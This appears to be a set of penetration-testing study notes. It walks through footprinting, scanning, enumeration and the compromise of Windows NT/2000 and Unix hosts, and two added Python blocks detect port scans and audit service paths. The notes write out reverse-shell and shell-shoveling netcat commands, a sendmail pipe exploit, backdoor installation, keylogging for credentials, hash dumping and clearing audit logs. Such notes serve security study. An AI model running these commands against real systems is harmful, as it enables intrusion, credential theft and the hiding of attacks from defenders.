Footprinting – profiling an organization's Internet, Intranet, Remote Access, and Extranet presence to determine security posture and netblocks
Website Pilfering – grabbing source code to analyze offline
Unix – Wget http://www.gnu.org/software/wget/wget.html
Win – Teleport Pro http://www.tenmax.com/teleport/home.htm
Search Engines – tools for searching multiple engines, IRC, email, etc at once
Win – FerretPRO($) http://www.ferretsoft.com
Web – DogPile http://www.dogpile.com
Registered Networks – internet whois searches
Current Registrars http://www.internic.net/alpha.html
Unix – Whois, Xwhois http://c64.org/~nr/xwhois/
Unix - $ whois "acme."@whois.crsnic.net (list possible domains)
Unix - $ whois "HANDLE JS1234"@whois.networksolutions.com (list POC info)
Unix - $ whois "@acme.net"@whois.networksolutions.com (list email info)
Web – US http://www.arin.net
Web – International http://www.allwhois.com
Web – US Military http://whois.nic.mil
Web – US Gov http://whois.nic.gov
DNS Interrogation – zone transfers between primary and secondary
Unix - $ nslookup
> server x.x.x.x
> set type=any
> ls -d Acme.net. >> /tmp/zone_out
Unix - $ host -l -v -t any Acme.net
Unix - $ host Acme.net (resolves Mail Exchange records)
Unix – axfr http://ftp.cdit.edu.cn/pub/linux/www.trinux.org/src/netmap/axfr-0.5.2.tar.gz
Win – Sam Spade http://www.samspade.org
Network Reconnaissance – determine the path to the network (access path diagram)
Unix - $ traceroute -S -p53 x.x.x.x (the -p option specifies the starting port, which increments by one per probe; -S stops incrementing once an open port is found)
Requires patch http://www.packetfactory.net/Projects/firewalk/traceroute.diff
Unix – traceroute option -I uses ICMP packets, default is UDP
Win – tracert (CLI)
Win – VisualRoute http://www.visualroute.com , NeoTrace http://www.neotrace.com (GUI)
Counter Measure – log incoming traceroutes and send back false data
RotoRouter http://packetstorm.securify.com/UNIX/loggers/rr-1.0.tgz
Scanning – determine systems that are alive and reachable via sweeps, port scans, and discovery tools
Ping Sweeps – sending out ICMP ECHO (type 8) across ranges
Unix – fping http://packetstorm.securify.com/Exploit_Code_Archive/fping.tar.gz
Unix – nmap, use the -sP option and a valid net range; -PT<#> allows you to try other ports if ICMP is blocked
Unix – Hping http://www.kyuzz.org/antirez/ allows you to send fragmented packets (-f)
Unix – icmpenum http://www.nmrc.org/files/sunix/icmpenum-1.1.1.tgz ability to use ICMP TIME STAMP REQUESTS and ICMP INFO when ECHO is blocked, spoof packets with the -s option, and passively listen with the -p option
Win – Pinger http://www.nmrc.org/files/snt/
Win – Ping Sweep http://www.solarwinds.net
Additional Tools
Unix – Loki2 http://www.phrack.org/show.php?p=51&a=6 wraps data in ICMP packets, used to bypass firewalls and install backdoors
Port Scanning – connecting to TCP and UDP ports on a target system to see which services are running and which OS is in use
TCP connect scan – full three-way handshake, easily detected by host or NIDS
TCP SYN scan – no ACK is sent, only RST/ACK, so that no connection is made; stealthier
TCP Xmas Tree Scan – uses FIN, URG, PUSH flags to receive RST for closed ports
TCP Null Scan – sends a packet with no flags to receive RST for closed ports
TCP ACK Scan – used to map firewall rulesets, determine statefulness
TCP Window Scan – analyzes TCP window size for OS identification and open ports
TCP RPC Scan – Unix, detects RPC ports and the associated program
UDP Scan – looks for ICMP port unreachable, less accurate, slower
Unix – Strobe ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/strobe-1.06.tgz TCP scanner, also grabs banners
Unix – Saint(SATAN) http://www.saintcorporation.com/products/download.html UDP scanner
Unix - netcat http://www.saintcorporation.com/products/download.html Multifunction scanner
Unix – nmap, -D option for decoy scan, -I option shows owner of service (root), -b ftp bounce
Win – SuperScan http://www.foundstone.com/resources/proddesc/superscan4.htm
FTP Bounce Scanning - allows an attacker to put/get data via a 3rd-party server that is trusted by the target host. Requires the PORT command and a writable directory on the system.
http://www.securityfocus.com/archive/1/3488
Scan Detection
Unix – Snort http://www.snort.org/docs/ open source NIDS
Unix – scanlogd http://www.openwall.com/scanlogd/ host based logging
Unix – PortSentry http://sourceforge.net/projects/sentrytools/ host based, detects and blocks
Unix – alert.sh http://www.spitzner.net/intrusion.html firewall scan detection
Win – Genius 3.2.3 http://www.indiesoft.com/ windows host based scan detection
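Scan detection logic in the spirit of scanlogd/PortSentry above, as an added example that is not from these notes or from those tools: it classifies each logged TCP probe by the flag combinations listed under Port Scanning (SYN, Xmas Tree, Null, ACK) and flags a source that hits many distinct ports in a short window. The log format and all addresses are constructed.

```python
"""Classify TCP probes by flag set and flag port scans in firewall logs.

Added example, not from the original notes.  Probe types follow the Port
Scanning list in the notes; the threshold logic is the idea scanlogd and
PortSentry implement on the host.
"""
import re
from collections import Counter, defaultdict

# Constructed sample log (iptables-style fields): one SYN scanner, one
# Xmas/Null scanner, and one ordinary client making a single connection.
SAMPLE_LOG = """\
1000.0 SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP SPT=40001 DPT=22 SYN
1000.1 SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP SPT=40002 DPT=25 SYN
1000.2 SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP SPT=40003 DPT=80 SYN
1000.3 SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP SPT=40004 DPT=139 SYN
1000.4 SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP SPT=40005 DPT=445 SYN
1000.5 SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP SPT=40006 DPT=3389 SYN
1001.0 SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=51000 DPT=80 SYN
1001.2 SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=51000 DPT=80 ACK PSH
1200.0 SRC=10.0.0.7 DST=10.0.0.20 PROTO=TCP SPT=60000 DPT=21
1200.1 SRC=10.0.0.7 DST=10.0.0.20 PROTO=TCP SPT=60001 DPT=23 FIN URG PSH
1200.2 SRC=10.0.0.7 DST=10.0.0.20 PROTO=TCP SPT=60002 DPT=53 FIN URG PSH
1200.3 SRC=10.0.0.7 DST=10.0.0.20 PROTO=TCP SPT=60003 DPT=111 FIN URG PSH
1200.4 SRC=10.0.0.7 DST=10.0.0.20 PROTO=TCP SPT=60004 DPT=2049
"""

LOG_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?) SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=TCP "
    r"SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)(?P<flags>(?: [A-Z]+)*)$"
)

# Flag combinations as the notes describe them.  A Window scan also sends
# bare ACKs, so on the wire it cannot be told apart from an ACK scan.
SCAN_TYPES = {
    frozenset(): "null",
    frozenset({"SYN"}): "syn",
    frozenset({"FIN", "URG", "PSH"}): "xmas",
    frozenset({"ACK"}): "ack",
}

def classify_flags(flags):
    """Return the probe type for a list of TCP flags, 'other' for normal segments."""
    return SCAN_TYPES.get(frozenset(flags), "other")

def parse_line(line):
    """Parse one log line into a dict, or None if it is not a TCP entry."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {"ts": float(m.group("ts")), "src": m.group("src"),
            "dpt": int(m.group("dpt")),
            "kind": classify_flags(m.group("flags").split())}

def detect_scans(lines, window=10.0, min_ports=5):
    """Return {src: {"ports": n, "types": Counter}} for each source that
    probes at least `min_ports` distinct ports within `window` seconds.
    Flags alone do not decide: a lone SYN or ACK is ordinary traffic, the
    breadth of ports touched is what marks a scan."""
    by_src = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_src[ev["src"]].append(ev)
    hits = {}
    for src, events in by_src.items():
        events.sort(key=lambda e: e["ts"])
        in_window = Counter()  # dpt -> packets to that port inside the window
        left, best = 0, 0
        for ev in events:
            in_window[ev["dpt"]] += 1
            while ev["ts"] - events[left]["ts"] > window:
                old = events[left]["dpt"]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            best = max(best, len(in_window))
        if best >= min_ports:
            hits[src] = {"ports": best,
                         "types": Counter(e["kind"] for e in events)}
    return hits

if __name__ == "__main__":
    for src, info in detect_scans(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: {info['ports']} ports, probes {dict(info['types'])}")
```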
OS Determination – using techniques such as banner grabbing, port scanning, and stack fingerprinting to determine the target host's Operating System
Stack Fingerprinting – analyzing the target machine's TCP/IP stack for OS-specific signatures. Each vendor implements the TCP/IP stack slightly differently.
http://www.insecure.org/nmap/nmap-fingerprinting-article.html
Passive Stack Fingerprinting – no connections are made; packets are only analyzed via a sniffer for specific attributes such as TTL, Window Size, and DF (don't fragment bit). The results can be compared to the Siphon fingerprint db http://www.l0t3k.org/security/tools/fingerprinting/
Discovery Tools
Unix – Cheops http://www.marko.net/cheops/ Linux GUI for network discovery via ping, traceroute, queso
Unix – Scotty http://wwwhome.cs.utwente.nl/~schoenw/scotty/ discovery tool, includes SNMP
Enumeration – process of extracting valid account and shared resource information for a target host
WINDOWS
Windows Resource Kits – contain useful Windows utilities
Win2K - http://www.microsoft.com/windows2000/techinfo/reskit/tools/default.asp
- http://www.dynawell.com/support/ResKit/win2k.asp
WinNT - http://www.dynawell.com/support/ResKit/winnt.asp
Null Sessions – CIFS/SMB & NetBIOS allow unauthenticated sessions via ports 139 & 445
Win – C:\>net use \\192.168.202.33\IPC$ "" /u:"" (setting up a null session)
Win – edit registry key HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous. Must be set to 1 for NT and 2 for W2K to restrict null sessions. Read Hobbit's CIFS paper for further info http://www.insecure.org/stf/cifs.txt
Domain Enumeration – use netbios on UDP port 137 to list domains and domain machines
Win – C:\>net view /domain
C:\>net view /domain: (lists machines on domain)
NetBIOS Name Tables – grab NetBIOS names remotely
Win – C:\>nbtstat -A 192.168.202.33
Win – C:\>nbtscan 192.168.234.0/24
Unix/Win versions found at http://www.inetcat.org/software/
Domain Controller Enumeration
Win – C:\>nltest /dclist: (run over a null session; nltest /server:)
C:\>nltest /trusted_domains
Share Enumeration
Win – C:\>net view \\ (rmtshare, srvinfo [-s] also good NTRK)
Win – DumpSec also shows file system permissions and services http://www.somarsoft.com/
Win – Legion 2.1 http://www.elhacker.net/hacking.htm
Win – NAT ftp://ftp.technotronic.com/microsoft/nat10bin.zip
Misc Windows Enumeration Tools
Win – Epdump RPC service/port mappings http://packetstormsecurity.org/NT/audit/epdump.zip
Win – netviewx lists specific server types like domain controller, RAS, print
C:\>netviewx -D -T
http://www.ibt.ku.dk/jesper/NetViewX/default.htm
Win – Winfo automates null sessions http://www.ntsecurity.nu/toolbox/winfo/
Win – Nbtdump provides HTML report http://www.cerberus-infosec.co.uk/toolsn.shtml
SNMP Enumeration
Win – Snmputil – browses the MIB (Management Information Base) tree using default community strings like public and private. The tree is hierarchical, so each time you "walk up" more information is revealed. ".1.3.6.1.4.1.77.1.2.25" is the OID for Microsoft's MIB. (NTRK)
C:\>snmputil walk 192.168.202.33 public .1.3.6.1.4.1.77.1.2.25
Win – IP Browser – Solarwinds GUI, http://www.solarwinds.net
More CIFS/SMB Enumeration
Win – Dumpsec(DumpACL) – uses null session to get user, group, share, and policy info
Win – sid2user/user2sid – allows for easy conversion of SIDs to usernames and vice versa
http://www.chem.mus.su:8080/~rudnyi/NT/sid.txt
C:\>user2sid \\ "domain users" (grabs the machine's SID)
C:\>sid2user \\ 5 21 8915387 1645822062 18198280005 500 (grabs the admin account's user name; note 500 is always the admin RID, even if it's renamed. Also, the first account created is always given an RID of 1000, incremented by one from there)
Mark Russinovich http://www.win2000mag.com/Articles/Index.cfm?ArticleID=3143
Win – Enum – CLI utility for enumeration & password guessing http://razor.bindview.com
C:\>enum -U -d -P -L -c
Win – Nete from sirdystic of cDc, similar to enum
Win – UserInfo/UserDump user Level 3 call on NetUserGetInfo API http://www.HammerofGod.com/download.htm
LDAP Enumeration
Win – ldp.exe – Active Directory Administration Tool – connects to an AD server and allows you to browse its contents; runs on either port 389 or 3268 (AD Global Catalog)
Banner Enumeration
Banner grabbing via telnet or netcat on various ports like 80, 21, 23,
25 will often leak system, OS, application, user, or version
information. Also common to “nudge” the system into coughing up more
information using commands like: GET / HTTP/1.0, HEAD, QUIT, HELP, ECHO,
and sometimes just carriage returns.
Registry Enumeration
Regdmp (NTRK) or DumpSec (Somarsoft) can both be used to do this; however, by default Win2K Server usually doesn't allow it. Review the key HKLM\System\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedPaths to see what's allowed.
UNIX
NFS Enumeration
Unix – showmount – lists all NFS(port 2049) exported file systems on a machine
$ showmount -e
NIS Enumeration
Unix – in general various NIS client tools can be used to guess the NIS domain name of a server and retrieve NIS maps, which contain valuable information (pscan by Pluvius)
User & Group Enumeration
Unix – finger (port 79), rwho, rusers all list who is on the machine at the time. To disable these services simply edit the inetd.conf file and killall -HUP inetd
Unix – SMTP – VRFY will confirm the name of a valid user; EXPN will give out the actual mail addresses of aliases and mailing lists. Just telnet to port 25 to test.
Unix – tftp – if enabled, may allow you to get the /etc/passwd file.
RPC Enumeration
Unix – rpcinfo, rpcdump – both list the RPC bindings for all applications running on the box. RPC uses ports 111, 32771.
http://www.atstake.com/research/tools/info_gathering/
SNMP Enumeration
Unix – the net-snmp package will usually include both snmpget and snmpwalk
$ snmpget public system.sysName.0 (grabs host name)
$ snmpwalk public (grabs entire MIB)
BGP Route Enumeration
Unix – ASN Queries – an ASN (Autonomous System Number) is a 16-bit integer purchased from ARIN to identify a company on the internet. Use http://www.completewhois.com/ to search for this info.
C:\> telnet route-views.Oregon-ix.net (public router)
> show ip bgp (last number in AS Path is ASN)
> show ip bgp regexp _$ (will give you the public IP space of company)
Windows NT Hacking – gaining access, escalating privileges and covering tracks on Windows NT system
Password Guessing
Default Passwords http://packetstormsecurity.org/docs/hack/dad.txt
http://phenoelit.darklab.org/cgi-bin/display.pl?SUBF=list&SORT=1
http://www.cirt.net/cgi-bin/passwd.pl
Null Password Tools – NTInfoScan http://packetstormsecurity.org/NT/audit/index2.html
SMBGrind http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=SMBGrind&type=archives
Password Sniffing – SMB Packet Capture (readsmb) included with L0phtCrack
PPTP – Unix-based sniffer that captures VPN credentials (packetstorm)
Cain & Abel filters out login credentials http://www.oxid.it/
Pass The Hash – NT only; LSASS allows hash-only authentication
http://www.core-sdi.com/papers/nt-cred.htm
Buffer Overflows – unexpected input which forces arbitrary code onto the execution stack
http://www.cultdeadcow.com/cDc_files/cDc-351/page1.html by DilDog
http://pulhas.org/phrack/55/P55-15.html by Barnaby Jack
http://www.insecure.org/stf/smashstack.txt by Aleph One
Privilege Escalation
Hoovering – process of stealing as much info off the machine as possible with a non-admin account. Srvinfo (NTRK) will enumerate shares and regdmp (NTRK) can probe the registry for info. Also good to script a find command in a batch file to look for the password string.
GetAdmin – uses DLL injection to add a user into the local admin group (crash4)
http://www.windowsitsecurity.com/Articles/Index.cfm?ArticleID=9231
Sechole, Secholed – escalates privileges of the IUSR_machine_name account on IIS; must be able to upload to an executable directory on the server
http://www.winnetmag.com/Article/ArticleID/9269/9269.html
LPC Spoofing – hk (porttool) from Razor exploits the LPC Ports API, which has weak validation checks. Allows a user to make a client thread as the SYSTEM user.
http://www.bindview.com/Support/RAZOR/Utilities/Windows/LPCAdvisory.cfm
Password Cracking – the SAM file may be obtained by booting to an alternate OS, from the repair directory, or by extracting it from the registry via a tool.
Pwdump – extracts password hashes from the SAM
http://packetstormsecurity.org/Crackers/NT/pwdump3.zip
L0phtcrack – de facto standard for cracking Windows passwords, not free anymore (LC5)
http://www.atstake.com/products/lc/index.html
Cain & Abel - Poor man’s version of LC, free http://www.oxid.it/cain.html
Wordlists - http://coast.cs.purdue.edu/pub/dict/ http://www.cotse.com/tools/wordlists.htm
Exploiting Trusts
LSA Secrets – the key HKLM\SECURITY\Policy\Secrets holds service account passwords in plain text, cached passwords of the last 10 users, FTP and web plain-text passwords, RAS usernames and passwords, and domain account information. Lsadump2 finds the PID of LSASS and uses DLL injection
http://www.bindview.com/Support/RAZOR/Utilities/Windows/lsadump2_readme.cfm
Sniffers
WinDump, "w32 tcpdump" http://windump.polito.it/install/default.htm
Ethereal http://www.ethereal.com/download.html
Dsniff for Win32 http://www.datanerds.net/~mike/dsniff.html
Keystroke Loggers - if sniffing fails, install a keystroke logger to obtain domain credentials
http://www.download.com/3120-20-0.html?qt=Keystroke+logger&tg=dl-2001
Remote Control & Backdoors - Remote.exe from NTRK gives remote users a CMD shell. The most popular way to start it on the host is to use the AT command (scheduler service).
SC.exe - Service Controller will start the scheduler service if it's not running: C:\> sc \\ start schedule
C:\> net time \\ (to check time on remote system)
C:\> at \\ 10:40P ""remote /s cmd secret"" (launches server) C:\> remote /c secret (launches your client)
Netcat - TCP/IP Swiss-Army Knife http://packetstormsecurity.org/UNIX/utilities/nc110.tgz
C:\> nc -L -d -e cmd.exe -p80 (starts listener on target host)
C:\> nc 80 (connects attacker to target host)
Netbus - similar to Back Orifice; the nbsvr.exe must be started on the target first. Good idea to run in stealth mode by modifying the registry, however most virus scanners will detect it running. Default ports are 12345 and 20034
C:\> regini -m \\ regchange.txt (NTRK) http://packetstormsecurity.org/trojans/NB20Pro.exe
BO2K - Back Orifice, still under active development, works on 2K and XP
http://www.bo2k.com/software/index.html
Along with these, VNC, NetMeeting, and DameWare are popular GUI-based remote control apps
Port Redirection
Netcat - "Shell Shoveling": the target listens on one port while sending the output back via cmd shell to the attacker. The attacker must listen on 2 ports
$ nc 80 | cmd.exe | nc 25 (run on target)
Fpipe - popular port redirector, also allows for specifying the source port. Does have some session timeout issues though with TIME_WAIT and CLOSE_WAIT periods
C:\>fpipe -v -l 53 -r 23 (command to run on target) http://www.foundstone.com/resources/proddesc/fpipe.htm
Root Kits - the first Windows rootkit was from Greg Hoglund of rootkit.com. A root kit is a software suite that substitutes system command binaries with Trojans. Rootkits use a technique known as "function hooking" to redirect calls without altering the executable or binary. The current generation of kernel-level rootkits are very difficult to detect as they are embedded in the OS. http://www.antiserver.it/Backdoor-Rootkit/
Cover Tracks
Disable Auditing
C:\> auditpol /disable (NTRK)
Clear Event Log
C:\> elsave -s \\ -l "Security" -C http://www.ibt.ku.dk/jesper/NTtools/
Hiding Files
C:\> attrib +h [directory] (DOS command)
NTFS File Streaming will hide stuff as additional file attributes. It requires the POSIX utility cp (NTRK)
C:\> cp : (just reverse to unhide)
Windows 2000 Hacking – gaining access, escalating privileges and covering tracks on Windows 2K system
Footprinting
Resource Kit Tools http://www.microsoft.com/windows2000/techinfo/reskit/tools/default.asp
http://www.dynawell.com/support/ResKit/win2k.asp
IPSec Filters - built-in feature which does packet filtering very early in the network stack and will drop any packets which fail to meet the rules. Only flaw is that it cannot block IKE, multicast, or broadcast traffic and can't do port ranges.
http://www.microsoft.com/technet/itsolutions/network/security/ipsecld.mspx
Enumeration
NetBIOS/SMB - system information will still be leaked unless you do 1 of 2 things. Disabling File and Print Sharing on your outbound interface will prevent null sessions. Set RestrictAnonymous = 2 in either the registry or in the Security Policy Manager.
Eavesdropping - all authentication sent using legacy LM hashes can be easily decrypted via L0phtcrack. Also, Kerberos authentication is not used if the user specifies an IP address instead of a hostname.
SMBRelay - when trying to connect to a share/server, Windows will automatically try to log in as the current user if no other authentication information is explicitly supplied, before asking the user for a logon/password. SMBRelay conducts a MITM attack by fooling a user into connecting to your rogue server; after capturing the traffic it is relayed to the actual destination and back to the end user.
http://www.xfocus.net/articles/200305/smbrelay.html
Denial of Service
New Registry Keys
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\SynAttackProtect = 2 (times out SYN_RECEIVED faster)
EnableDeadGWDetect = 0 (prevents attacker from changing default gw)
EnablePMTUDiscovery = 0 (stops hackers from lowering MTU value)
KeepAliveTime = 300,000 (verifies an idle connection is still intact)
Interfaces\NoNameReleaseOnDemand = 0 (stops malware)
Interfaces\PerformRouterDiscovery = 0 (stops router spoofing attack)
http://support.microsoft.com/default.aspx?scid=kb;en-us;142641
Nbname - this tool puts a host in NetBIOS Name Conflict, effectively stopping all NetBIOS networking on the host. Must first disable NBT on the attacker machine to use the tool.
C:\>nbname /astat /conflict http://www.securityfocus.com/tools/1670
Privilege Escalation
PipeUpAdmin - pre-SP2, puts the current user into the admin group when run from a cmd prompt
http://content.443.ch/pub/security/blackhat/WinNT%20and%202K/pipeup/W2KPipeUp/
NetDDE - Network Dynamic Data Exchange service allows applications to share data through "trusted shares". Runs as SYSTEM, so arbitrary code can be attached to the request and voilà, you're admin. Requires Visual C++.
C:\>netddemsg -s cmd.exe http://www.atstake.com/research/advisories/2001/netddemsg.cpp
Pilfering
Defeating SYSKEY - pwdump3 can extract hashes from the SAM. Also pwdump3e from ebiz can do this remotely via SMB.
http://www.securityfocus.com/tools/1964/
chntpw can be used on bootable media to insert hashes into the SAM. It disables SYSKEY prior to doing this. Similar to NTFSDOS Pro.
http://home.eunet.no/~pnordahl/ntpasswd/syskey.txt
Deleting SAM - simply booting to an alternate OS and deleting the SAM nullifies the administrator password. DCs are not vulnerable.
http://www.securiteam.com/windowsntfocus/5FP0B0U1FW.html
EFS - Encrypting File System allows users to encrypt files and folders at the OS level. Cipher can be used from the CMD line. The default Recovery Key is the local admin account, however it should be stored remotely.
http://www.microsoft.com/windows2000/techinfo/howitworks/security/encrypt.asp
EFS Temporary - EFS writes a temp file in plain text before encrypting a new file; a low-level disk editor like diskprobe.exe (RK) can recover the file even after it's deleted because the disk blocks are not overwritten.
Exploiting Trust
LSA Secrets - lsadump2 still functions on W2K. Microsoft doesn’t consider it a problem
Multimaster Model - within a Windows 2K forest, all domains replicate a shared Active Directory and trust each other with 2-way transitive trusts necessitated by the Kerberos implementation. Trusts between forests and NT domains are still one-way. This allows for consolidation of domains and delegation of permissions via OUs (organizational units).
Back Doors
Trap-Dooring Path - when executables and DLL files are not preceded by a path in the registry, Windows searches for them in a default order. Therefore by placing your trojaned file on the system drive, the system will launch it instead of the original file.
http://www.winnetmag.com/WindowsSecurity/Article/ArticleID/9637/WindowsSecurity_9637.html
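An audit for the search-order condition described above, added here as example code rather than anything from the notes: it flags a bare executable name in a service ImagePath or Run value and, going one step beyond the notes, an unquoted path containing spaces, which Windows also resolves by trying each space-delimited prefix first. The sample entries are constructed; the optional winreg reader only works on a Windows host.

```python
"""Audit registry command lines for executables resolved by search order.

Added example, not from the original notes.  A service ImagePath or Run
value that names a program without a path is located through Windows'
search order, so a planted file earlier in that order runs instead; an
unquoted path with spaces is resolved by trying each space-delimited
prefix first, which has the same effect.  Sample entries are constructed.
"""
import re

EXE_EXT = re.compile(r"\.(exe|com|bat|cmd|dll|sys)$", re.IGNORECASE)

# Constructed (location, command line) pairs; not read from any real host.
SAMPLE_ENTRIES = [
    (r"Services\GoodSvc\ImagePath",
     r'"C:\Program Files\Vendor\goodsvc.exe" -k netsvcs'),
    (r"Services\Spooler\ImagePath", r"%SystemRoot%\system32\spoolsv.exe"),
    (r"Services\Drv\ImagePath", r"\SystemRoot\system32\drivers\drv.sys"),
    (r"Services\OddSvc\ImagePath", r"oddsvc.exe -service"),
    (r"Services\Backup\ImagePath",
     r"C:\Program Files\Backup Tool\bkagent.exe /start"),
    (r"Software\Microsoft\Windows\CurrentVersion\Run\Updater", r"updater.exe"),
]


def resolve_executable(command):
    """Return (executable, quoted, tokens_consumed) for the program part of a
    command line.  A quoted program is taken whole; an unquoted one grows
    token by token until an executable extension appears, which is the
    sequence of prefixes Windows itself tries."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return (command[1:end] if end > 0 else command[1:]), True, 1
    tokens = command.split(" ")
    for i in range(len(tokens)):
        candidate = " ".join(tokens[: i + 1])
        if EXE_EXT.search(candidate):
            return candidate, False, i + 1
    return tokens[0], False, 1  # no recognisable extension: first token


def has_directory(exe):
    """True when the program carries a directory (drive, \\SystemRoot or an
    environment-variable root), so no search-order lookup is needed."""
    return "\\" in exe or "/" in exe


def audit_image_paths(entries):
    """Return [(location, executable, finding)] for every risky command line."""
    findings = []
    for location, command in entries:
        exe, quoted, consumed = resolve_executable(command)
        if not has_directory(exe):
            findings.append((location, exe,
                             "bare file name: located via the search order"))
        elif not quoted and consumed > 1:
            findings.append((location, exe,
                             "unquoted path with spaces: shorter prefixes are tried first"))
    return findings


def read_service_image_paths():
    """Collect every service's ImagePath from HKLM on a Windows host using the
    standard-library winreg module; returns [] on other platforms."""
    try:
        import winreg
    except ImportError:
        return []
    entries = []
    base = r"SYSTEM\CurrentControlSet\Services"
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, base) as services:
        for i in range(winreg.QueryInfoKey(services)[0]):
            name = winreg.EnumKey(services, i)
            try:
                with winreg.OpenKey(services, name) as svc:
                    value, _ = winreg.QueryValueEx(svc, "ImagePath")
                entries.append((f"Services\\{name}\\ImagePath", str(value)))
            except OSError:
                pass  # no ImagePath value (e.g. a driver group) or access denied
    return entries


if __name__ == "__main__":
    for location, exe, finding in audit_image_paths(
            read_service_image_paths() or SAMPLE_ENTRIES):
        print(f"{location}: {exe} -> {finding}")
```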
Remote Control
Terminal Services running on 3389: TS allows brute-force password guessing even if a lockout policy is set. TS also allows existing connections to be hijacked if the previous user forgot to log out correctly, assuming you have their credentials.
New Stuff
Group Policy - GPO is a new 2K feature that allows you to configure security parameters in one place to be enforced locally or on the domain. (Gpedit.msc)
Secedit - Security Configuration and Analysis tool allows admins to audit the local system security for compliance issues. It also allows you to automatically make updates and have them applied immediately.
XP Stuff
ICF - Internet Connection Firewall offers packet filtering on all inbound traffic, while permitting all outbound traffic.
Software Restriction Policy allows central control over application security to protect against various forms of malware.
Built-In Support for encrypted Wireless Networking(802.11).
MS Passport single-login solution for the internet, works by using a tamper-resistant cookie for accessing all sites that support MS Passport authentication.
Credential Management, WPA, Remote Desktop, UPNP
UNIX/Linux Hacking – gaining access, escalating privileges and covering tracks on *NIX system
Vulnerability Mapping is the process of mapping specific security attributes of a system to an associated vulnerability or potential vulnerability.
Nessus is a de facto standard because it's free and works. http://www.nessus.org/download.html (unix & windows ports)
Remote Attacks - Exploit a Listening Service (telnet, ftp, ssh, etc)
Route Through a Unix System – circumvent a Unix firewall by source routing your packets through the firewall. Works only if the system has IP forwarding enabled.
User-Initiated Remote Execution – attacks requiring user interaction, such as browsing malicious web sites or opening email attachments.
Promiscuous Mode Attacks – crafted packets can exploit your sniffer application
Brute Force - Brutus, common tool http://www.hoobie.net/brutus/brutus-download.html
John - Standard Unix Cracker http://www.openwall.com/john/
Data Driven Attacks are executed by sending data to an active service that causes unintended or undesirable results.
Buffer Overflow condition occurs when a user or process attempts to place more data into a buffer than was originally allocated. This type of behavior is associated with specific C functions like strcpy, strcat, sprintf etc. A buffer overflow condition would normally cause a segmentation violation to occur. When the attack is executed, special assembly code known as the egg is sent to the VRFY command as part of the actual string used to overflow the buffer. When it's overrun, attackers can set the return address of the offending function to point to their arbitrary code's memory address, which usually includes a shell command. http://www.piaffe.org/panic/
Unix Memory Dump Analysis, Good Luck http://www.phrack.org/
Aleph One's Paper Phrack 49 http://www.securityfocus.com/tools/1500
Hell Kit for writing buffer overflows
Disable stack execution in /etc/system:
set noexec_user_stack=1
set noexec_user_stack_log=1
Heap Overflows are based on overrunning memory that has been dynamically allocated by an application. This process differs from stack-based overflows, which depend on overflowing a fixed-length buffer.
http://www.w00w00.org/files/heaptut/heaptut.txt
Format String Vulnerability arises from subtle programming errors in the formatted output family of functions, which includes printf() and sprintf(). An attacker can take advantage of this by passing carefully crafted text strings containing formatting directives, which can cause the target computer to execute arbitrary commands. For example, by using printf(buf) instead of printf("%s", buf) the system will read the first argument supplied by the user as the format string and allow arbitrary code to follow it.
Input Validation Attacks occur when a program fails to recognize syntactically incorrect input, a module accepts extraneous input, a module fails to handle missing input fields, or a field-value correlation error occurs. Often used to exploit CGI scripts or other web applications.
Shell Access – X Term, if enabled, is the easiest way to get local GUI access on a machine remotely, but may need to be combined with an exploit. $ /usr/X11R6/bin/xterm -ut :0.0
Reverse Telnet/Netcat will both provide attackers with a back channel into the system that originates from the target host. Both require a listener to be running.
$ /bin/telnet 80 | /bin/sh | /bin/telnet 25
$ nc -e /bin/sh 80
TFTP/Anonymous FTP both will allow an attacker to gain access to your machine, and if a writeable/executable directory is available the system is toast. The services themselves may be vulnerable to exploits.
Sendmail, the standard Unix Mail Transfer Agent, has been full of vulnerabilities dating back to 1988. Common attacks aside from buffer overflows, input validation, and SMTP enumeration include:
Pipe Vulnerability, which allows a user to escape to a shell after the data portion
helo
mail from:
rcpt to: bounce
data
.
mail from: bin
rcpt to: |sed '1,/^$/d' | sh
data
Forward Vulnerability – cat > .forward (create a .forward file to ftp to the user's home directory) containing |"cp /bin/sh /home/gk/evil_shell ; chmod 755 /home/gk/evil_shell" (creates a shell executable)
$ echo hello chump | mail gk@targetsystem.com
Refer to http://www.sendmail.org/ for up to date information
RPC is a mechanism that allows a program running on one computer to seamlessly execute code on a remote system. Most buffer overflow attacks target RPC services that run as root in order to gain shell access to the target system. Common services exploited include rpc.ttdbserverdb (tooltalk), rpc.cmsd (CDE), rpc.statd (automount), mountd, sadmind, and snmpXdmid.
NFS allows transparent access to files and directories of remote systems as if they were stored locally. Most of the security provided by NFS relates to a data object known as a file handle. The file handle is a token that is used to uniquely identify each file and directory on the remote server. If a file handle can be sniffed or guessed, remote attackers could easily access those files on the remote system.
$ showmount -e (lists exported file systems & permissions)
$ mount :/ /mnt
Try NFSshell for more functionality ftp://ftp.cs.vu.nl/pub/leendert
X Windows System allows exporting of the local graphical display to remote users. Xscan will scan an entire subnet looking for systems with xhost + enabled and log any console keystrokes to a local logfile.
http://www.seguridad0.net/programas/X-Scan-v3.0.zip
$ xlswins -display :0.0 (will list out hex IDs for you)
$ xwatchwin -w (allows you to observe somebody else's X session)
DNS Insecurity refer to http://www.isc.org/index.pl?/sw/bind/bind-security.php
